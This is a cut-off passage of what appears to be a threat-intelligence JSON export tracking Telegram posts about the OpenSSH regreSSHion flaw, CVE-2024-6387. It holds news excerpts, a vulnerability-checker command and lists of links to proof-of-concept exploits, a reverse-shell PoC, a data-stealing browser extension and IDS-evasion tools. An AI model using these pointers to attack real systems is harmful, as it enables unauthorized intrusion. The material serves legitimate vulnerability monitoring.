"0960997e-ca27-4875-a055-6c89ac21d1ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/j2ZqMLpz9kukpqr-a94JjO2oRUJHQRhyZ-kTbjJX2PMGB2yB", "content": "", "creation_timestamp": "2024-07-11T21:47:35.000000Z"}, {"uuid": "4dde3107-40c7-4ffe-a342-dca681eaca72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/13749", "content": "The Hacker News\nNew OpenSSH Vulnerability Could Lead to RCE as Root on Linux Systems\n\nOpenSSH maintainers have released security updates to contain a critical security flaw that could result in unauthenticated remote code execution with root privileges in glibc-based Linux systems.\nThe vulnerability has been assigned the CVE identifier CVE-2024-6387. It resides in the OpenSSH server component, also known as sshd, which is designed to listen for connections from any of the client", "creation_timestamp": "2024-07-01T16:04:43.000000Z"}, {"uuid": "e9bf389c-5aea-4f2c-a9ac-4f0e51f41f7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/arvinclub1/1119", "content": "\u2b55\ufe0f \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u0628\u0647 \u0646\u0627\u0645 regreSSHion \u0631\u0648\u06cc OpenSSH \u06a9\u0634\u0641 \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0647 \u0647\u06a9\u0631\u0647\u0627  \u0627\u062c\u0627\u0632\u0647 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0631\u0627 \u0645\u06cc\u062f\u0647\u062f.\n\u0634\u0645\u0627\u0631\u0647 CVE \u062b\u0628\u062a \u0634\u062f\u0647 CVE-2024-6387 \u06a9\u0647 \u062a\u062d\u0644\u06cc\u0644 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0645\u06cc\u062a\u0648\u0646\u06cc\u062f \u0627\u06cc\u0646\u062c\u0627 \u0628\u062e\u0648\u0646\u06cc\u062f.\n\u062f\u0631 \u0627\u06cc\u0631\u0627\u0646 \u0628\u0627\u0644\u0627\u06cc 85 \u0647\u0632\u0627\u0631 \u0633\u0631\u0648\u0631 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0647 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u0647 \u0644\u0637\u0641\u0627 \u0627\u0637\u0644\u0627\u0639 \u0631\u0633\u0627\u0646\u06cc \u06a9\u0646\u06cc\u062f.", "creation_timestamp": "2024-07-03T11:20:29.000000Z"}, {"uuid": "9f99a28e-85e7-4140-9b49-4b8b739785b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/2bhHtdq2jP8J5gz5Cg8DCeFMwhCa9jcURP0gJ1NcPxODt7lR", "content": "", "creation_timestamp": "2024-12-20T08:53:37.000000Z"}, {"uuid": "da61e658-f429-41da-942d-abcf0c67747d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/3595", "content": "https://github.com/ThatNotEasy/CVE-2024-6387", "creation_timestamp": "2024-07-16T08:12:55.000000Z"}, {"uuid": "b5c7e029-3ef2-425d-a7e5-184c63350562", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/SiH_y8A5kQvHxz-RiCvDf-gFQd8jyBhjyDYzcIhRmqOriVLZ", "content": "", "creation_timestamp": "2024-11-05T14:07:45.000000Z"}, {"uuid": "e68fca2b-cbc3-454f-9944-fe675875511e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/RYpDBVOak61GNwVd0TDSgrjGJRF2SNZ3xZRGT4-hhCTGXoM", "content": "", "creation_timestamp": "2024-07-04T20:51:24.000000Z"}, {"uuid": "9dbc3a66-9968-4c06-874f-ec380a493434", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/330", "content": "\ud83d\udd11 RegreSSHion \u2014 OpenSSH Unauthenticated RCE\n\nRace condition unauthenticated RCE \u0432 OpenSSH\u2019s \u0441\u0435\u0440\u0432\u0435\u0440 (sshd) \n\nCVE-2024-6387\n\n\ud83d\udd20 \u0420\u0430\u0437\u0431\u043e\u0440: \nhttps://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server\n\n\ud83d\udd20 Checker:\nhttps://github.com/xaitax/CVE-2024-6387_Check\n\npython3 CVE-2024-6387_Check.py 192.168.1.1 example.com --port 2222\n\nPoC \u0432 \u0431\u043e\u0442\u0435:\n\n!poc CVE-2024-6387\n\n#openssh #glibc #rce #cve\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-07-02T11:53:35.000000Z"}, {"uuid": "9c9ab26d-c26d-447e-b4e1-610c43a75c26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/9oMa3b3HkGtTrSTqaEezHMabH__xr3eskkST-Cgp5dgqH3ri", "content": "", "creation_timestamp": "2024-07-12T19:27:34.000000Z"}, {"uuid": "9404fd61-5e13-4947-91b0-40bfdd0d30ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/PSu0bdYWuWcAlUrdlqSVgLYVMCDtiI6zmUZjQBwoDqGez2ap", "content": "", "creation_timestamp": "2025-01-18T21:44:25.000000Z"}, {"uuid": "8b3aeb46-fb50-4d04-9e35-db7eec7e4478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/G143fzmQA3vrvJlo9ucqmUJXepOEngtvhdSrm8HOXMxRhAOo", "content": "", "creation_timestamp": "2024-12-20T08:53:38.000000Z"}, {"uuid": "66db6a44-07f9-4e8d-9a9f-09444a6ee254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/ajfROv1QoHUj58dp2oqWQFnqZHIQm8x73UMobhaAg19_N0U", "content": "", "creation_timestamp": "2024-07-04T20:51:24.000000Z"}, {"uuid": "a0ae90fa-ec90-4697-a0c1-c1b13dbaaa4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/Ca_dHMCew5ij7uiWWDOTpy0dqswiqZ-rkeivyt-XqlI1ldPu", "content": "", "creation_timestamp": "2024-11-05T14:07:47.000000Z"}, {"uuid": "c5d3e489-e5bb-41fa-b5d6-b05da7cbab43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/1ll7JiBzK1IqezGCyXn0uqEBRzkWMFM3Ovd8k2CChghGzA", "content": "", "creation_timestamp": "2024-07-01T14:35:01.000000Z"}, {"uuid": "92c6febe-e0cf-48d4-b8c7-c7d47782dcaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/1ifkAPYSOOEOgWeTPaz95twkPcahhdqkVXzIlsvxHBlRbHPf", "content": "", "creation_timestamp": "2025-01-12T22:43:32.000000Z"}, {"uuid": "025b5415-4c1e-4748-a808-6b31729bcf20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/_NVbWyOw948OTHRByw2tszxfnZicrg2DUGaUTaDmuYR5mno", "content": "", "creation_timestamp": "2024-08-06T23:48:46.000000Z"}, {"uuid": "8ebfb1eb-adf3-42be-98b1-980fcc35658c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/6m07qxbiBIKGQ9YvnleocZ7Y0sjevL7K6zx_iSLKmKc76_Cc", "content": "", "creation_timestamp": "2025-01-07T04:38:22.000000Z"}, {"uuid": "53223fdd-32d8-42b6-8e3c-e5487a70c9bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/3bJC2O_gqYyvV04JVfYJZH4La-jJYx9BVWlZPF4PYbgVaxrAVg", "content": "", "creation_timestamp": "2024-12-21T13:42:30.000000Z"}, {"uuid": "b9bfd1ca-cb54-42d3-8526-d26dd024712d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/aA00fTOCbqo_K196w3NGsoQs7mgayFaP8G8BQ5drY4XuKPnhAQ", "content": "", "creation_timestamp": "2024-12-20T21:56:18.000000Z"}, {"uuid": "05130ae1-2bae-4496-8d75-b91636f0873f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/ZeroDay_ru/371", "content": "#exploit\n1. CVE-2024-43405:\nNuclei Signature Verification Bypass\nhttps://www.wiz.io/blog/nuclei-signature-verification-bypass\n\n2. CVE-2024-6387:\nRegreSSHion Code Execution Vulnerability\nhttps://cybersecuritynews.com/regresshion-code-execution-vulnerability", "creation_timestamp": "2025-01-07T11:00:18.000000Z"}, {"uuid": "b7c2c0f0-f76b-42e0-b668-a7a016de6be2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/41312", "content": "CVE-2024-6387\n\nhttps://github.com/zgzhang/cve-2024-6387-poc", "creation_timestamp": "2024-07-04T20:51:24.000000Z"}, {"uuid": "3c8b06db-cc71-480c-80f4-535c9c4e0f35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/315", "content": "Tools - Hackers Factory\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nOSED Material (Offensive Security Exploit Developer) \n\nhttps://github.com/epi052/osed-scripts\n\nhttps://github.com/nop-tech/OSED\n\nExploitation-course OSED\n\nhttps://github.com/ashemery/exploitation-course\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can.\n\nhttps://github.com/classvsoftware/spy-extension\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nGitHub - blackhillsinfosec/skyhook: A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.\n\nhttps://github.com/blackhillsinfosec/skyhook\n\nRed-Team-Management/Red Team Courses\n\nhttps://github.com/CyberSecurityUP/Red-Team-Management/blob/main/Red%20Team%20Courses.md\n\nA CVE-2021-34527 (a.k.a PrintNightmare) Python Scanner\n\nhttps://github.com/byt3bl33d3r/ItWasAllADream\n\nDOME: A subdomain enumeration tool\n\nDownload: github.com/v4d1/Dome\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-03T13:13:10.000000Z"}, {"uuid": "3a73aa46-84ed-4950-8c0e-d1b1b946a52e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/ADmedM95kByDcCNpMf4Yprqz7t01FKYHlAAE1LdcmjJQFA", "content": "", "creation_timestamp": "2024-07-10T06:23:20.000000Z"}, {"uuid": "8507e118-f393-45f4-89e5-2b658433ceeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/355", "content": "Tools - Hackers Factory \n\nGitHub - filipi86/CVE-2024-6387-Vulnerability-Checker: This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.\n\nhttps://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker\n\nAuto-Gmail-Creator\n\nhttps://github.com/ai-to-ai/Auto-Gmail-Creator\n\nMalwoverview 6.0.0 has been released:\n\nhttps://github.com/alexandreborges/malwoverview\n\nGitHub - skewyapp/skewyapp: Tool to prevent eavesdropping and ultrasonic access of your smart phone.\n\nhttps://github.com/skewyapp/skewyapp\n\nk8s-sniff-https\n\nA simple mitmproxy blueprint to intercept HTTPS traffic from apps running on Kubernetes\n\n\u2192 Reverse engineer API calls or debug third party apps that performs HTTPS calls to remote SaaS backends\n\nhttps://github.com/ofirc/k8s-sniff-https\n\nGitHub - testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nhttps://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nGitHub - Pr0teus/malandres-lingo: Corretores ortogr\u00e1ficos s\u00e3o \u00f3timos para corrigir erros de digita\u00e7\u00e3o, mas tamb\u00e9m podem ser usados para alterar a nossa forma de escrever, de forma mascarar nossa personalidade.\n\nhttps://github.com/Pr0teus/malandres-lingo\n\nGitHub - LukeSmithxyz/emailwiz: Script that installs/configures a Dovecot, Postfix, Spam Assassin, OpenDKIM Debian web server\n\nhttps://github.com/LukeSmithxyz/emailwiz\n\nGitHub - hahwul/authz0: \ud83d\udd11 Authz0 is an automated authorization test tool. Unauthorized access can be identified based on URLs and Roles & Credentials.\n\nhttps://github.com/hahwul/authz0\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-12T10:15:12.000000Z"}, {"uuid": "c4524b79-54fa-4288-8ab2-4923e74c4cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/396", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T02:46:52.000000Z"}, {"uuid": "c087ab5c-284f-42e4-b4da-021bd42cd14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/jUu8FLk2Xl5p6O34K22ufRT1G2MW3Gnu_cMFzlWh7hO19Bs", "content": "", "creation_timestamp": "2024-07-02T11:43:44.000000Z"}, {"uuid": "c4006c10-da8b-4899-a80b-bf4255610f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/bZMKLhnQ0TpcsVfuRCE-u5Qqt0xZ29Vnl08omqkAdzLg4To", "content": "", "creation_timestamp": "2024-07-01T21:31:16.000000Z"}, {"uuid": "78eaccc1-ce6e-4c58-928e-b47e140df14b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/2863", "content": "The Hacker News\nNew OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "1037bf7c-1d58-485b-b5b6-a2286c959c28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/341", "content": "Tools - Hackers Factory\n\nGitHub - EvilBytecode/Bloxstrap-Persistance: Bloxstrap-Persistance modifies Bloxstrap's settings (Settings.json) to add persistent integrations, showcasing how applications can be exploited.\n\nhttps://github.com/EvilBytecode/Bloxstrap-Persistance\n\nGitHub - techgaun/github-dorks: Find leaked secrets via github search\n\nhttps://github.com/techgaun/github-dorks\n\nGitHub - lachlan2k/phatcrack: Modern web-based distributed hashcracking solution, built on hashcat\n\nhttps://github.com/lachlan2k/phatcrack\n\nGitHub - MatheuZSecurity/ModTracer: ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\nGitHub - omrikiei/ktunnel: A cli that exposes your local resources to kubernetes\n\nhttps://github.com/omrikiei/ktunnel\n\nGitHub - BrandonLynch2402/cve-2024-6387-nuclei-template\n\nhttps://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template\n\nGitHub - D3Ext/WEF: Wi-Fi Exploitation Framework\n\nhttps://github.com/D3Ext/WEF\n\nGitHub - spyboy-productions/omnisci3nt: Unveiling the Hidden Layers of the Web \u2013 A Comprehensive Web Reconnaissance Tool\n\nhttps://github.com/spyboy-productions/omnisci3nt\n\nGitHub - WerWolv/ImHex: \ud83d\udd0d A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.\n\nhttps://github.com/WerWolv/ImHex\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can\n\nhttps://github.com/classvsoftware/spy-extension\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-06T08:34:12.000000Z"}, {"uuid": "3b19d6cd-89d5-4a3b-9493-76fc5af01d8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/uJIaCgISsKnh0Y2QVuKqFgrUPmRcVvF3z8R4sO9m4c1g4EkS", "content": "", "creation_timestamp": "2024-07-01T13:51:06.000000Z"}, {"uuid": "7b10d584-6e35-4254-ac66-c8e07c518bc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/2692", "content": "The Hacker News\nNew OpenSSH Vulnerability Could Lead to RCE as Root on Linux Systems\n\nOpenSSH maintainers have released security updates to contain a critical security flaw that could result in unauthenticated remote code execution with root privileges in glibc-based Linux systems.\nThe vulnerability has been assigned the CVE identifier CVE-2024-6387. It resides in the OpenSSH server component, also known as sshd, which is designed to listen for connections from any of the client", "creation_timestamp": "2024-07-01T16:04:43.000000Z"}, {"uuid": "1549de4a-54e3-4b86-8e21-dda498d3d25a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/334", "content": "Tools - Hackers Factory\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nPrivilege Escalation Enumeration Script for Windows\n\nhttps://github.com/itm4n/PrivescCheck\n\nTwo new offensive techniques using Windows Fibers: PoisonFiber (The first remote enumeration & Fiber injection capability POC tool) PhantomThread (An evolved callstack-masking implementation)\n\nhttps://github.com/JanielDary/ImmoralFiber\n\nStatic deobfuscator for Themida/WinLicense/Code Virtualizer's mutation-based obfuscation.\n\nhttps://github.com/ergrelet/themida-unmutate\n\nExample code samples from our ScriptBlock Smuggling Blog post\n\nhttps://github.com/BC-SECURITY/ScriptBlock-Smuggling\n\nRusty Hypervisor - Windows UEFI Blue Pill Type-1 Hypervisor in Rust (Codename: Illusion)\n\nhttps://github.com/memN0ps/illusion-rs\n\nThis Burp Suite extension allows you to copy HTTP requests without including cookies or tokens. It removes sensitive information related to authentication, session management, and CSRF protection from the requests, making it easier to share or analyze them without exposing sensitive data.\n\nhttps://github.com/haticeerturk/requestCleaner\n\nGitHub - pl4int3xt/cve_2024_0044: CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13 -\n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nZyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection CVE-2024-29973\n\nhttps://github.com/momika233/CVE-2024-29973\n\nSudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing advanced automated reconnaissance (framework). This tool can also be used for OSINT (Open-source intelligence) activities.\n\nhttps://github.com/screetsec/Sudomy\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-04T12:32:32.000000Z"}, {"uuid": "b5959f1f-e747-42d5-9882-5d40d9c9e9a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/TH2XRIXWEZp6WypS9l_F9Qmungy3VnyePEZXhYGFKEE-CHQQ", "content": "", "creation_timestamp": "2024-07-06T13:07:11.000000Z"}, {"uuid": "e78037e1-4ec2-4d50-8540-1b9c6fb9153e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/141011", "content": "CVE-2024-6387: \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 RCE \u00abregreSSHion\u00bb\n*\n\u041f\u043e\u0447\u0438\u0442\u0430\u0442\u044c\n*", "creation_timestamp": "2024-07-03T17:52:09.000000Z"}, {"uuid": "03a0b08f-4a64-423d-8c25-38188912a2ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/KomunitiSiber/2187", "content": "New OpenSSH Vulnerability Could Lead to RCE as Root on Linux Systems\nhttps://thehackernews.com/2024/07/new-openssh-vulnerability-could-lead-to.html\n\nOpenSSH maintainers have released security updates to contain a critical security flaw that could result in unauthenticated remote code execution with root privileges in glibc-based Linux systems.\nThe vulnerability has been assigned the CVE identifier CVE-2024-6387. It resides in the OpenSSH server component, also known as sshd, which is designed to listen for connections from any of the client", "creation_timestamp": "2024-07-01T14:28:35.000000Z"}, {"uuid": "bce9ddf4-9409-4c6b-861c-84c9a1656f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/KomunitiSiber/2227", "content": "New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\nhttps://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T06:30:56.000000Z"}, {"uuid": "c46ce19a-0fb4-406a-a143-379904e1a57f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8198", "content": "Tools - Hackers Factory \n\nGitHub - filipi86/CVE-2024-6387-Vulnerability-Checker: This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.\n\nhttps://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker\n\nAuto-Gmail-Creator\n\nhttps://github.com/ai-to-ai/Auto-Gmail-Creator\n\nMalwoverview 6.0.0 has been released:\n\nhttps://github.com/alexandreborges/malwoverview\n\nGitHub - skewyapp/skewyapp: Tool to prevent eavesdropping and ultrasonic access of your smart phone.\n\nhttps://github.com/skewyapp/skewyapp\n\nk8s-sniff-https\n\nA simple mitmproxy blueprint to intercept HTTPS traffic from apps running on Kubernetes\n\n\u2192 Reverse engineer API calls or debug third party apps that performs HTTPS calls to remote SaaS backends\n\nhttps://github.com/ofirc/k8s-sniff-https\n\nGitHub - testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nhttps://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nGitHub - Pr0teus/malandres-lingo: Corretores ortogr\u00e1ficos s\u00e3o \u00f3timos para corrigir erros de digita\u00e7\u00e3o, mas tamb\u00e9m podem ser usados para alterar a nossa forma de escrever, de forma mascarar nossa 